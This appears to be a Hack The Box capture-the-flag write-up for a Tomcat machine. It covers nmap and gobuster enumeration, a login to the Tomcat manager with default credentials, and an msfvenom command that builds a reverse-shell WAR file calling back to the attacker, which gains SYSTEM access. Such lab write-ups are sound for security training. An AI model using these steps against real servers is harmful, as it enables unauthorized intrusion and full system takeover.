Initial Enumeration

Our initial enumeration doesn't leave much to the imagination here, our quick nmap scan only returns one open port.
nmap -sV
Nmap Results
Naturally we assume Tomcat is our target for this box. On tomcat instances, you can reach the management console at /manage, but if you didn't know that already, you can find that using gobuster:
gobuster dir -u -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 50
Gobuster Results
For the login we treat it like any other application, google for default credentials. Doing this brought me to a great github repository for default credentials where I found this page. Using the credentials tomcat:s3cret from that list gives us access.


Looking at the management console, we see something that catches our eye as a path to execution:
WAR Upload Form
Know that we know we can deploy war files to the server, we can generate a reverse shell with msfvenom:
msfvenom -p java/shell_reverse_tcp LHOST=$(tunip) LPORT=4443 -f war > evil.war
tunip is a handy bash alias I use to get my current IP address for Hack The Box. it is set to ifconfig tun0 | sed -n '2 p' | awk '{print \$2}' in my ~/.bash_aliases
If you happen to work out of a folder shared between your kali VM and windows like I do, windows defender will nuke this file as soon as you generate it. So it's best to do this somewhere else (I just generated it in /tmp)
After uploading this file we can see it in the list of running applications:
Evil War Application
Clicking on the link to our malicious application triggers the reverse shell. It just happens that Tomcat is run as nt authority/system in this case, so we now have full access to the system and are able to read the user and root flags:
User and Root Flags
Last modified 2yr ago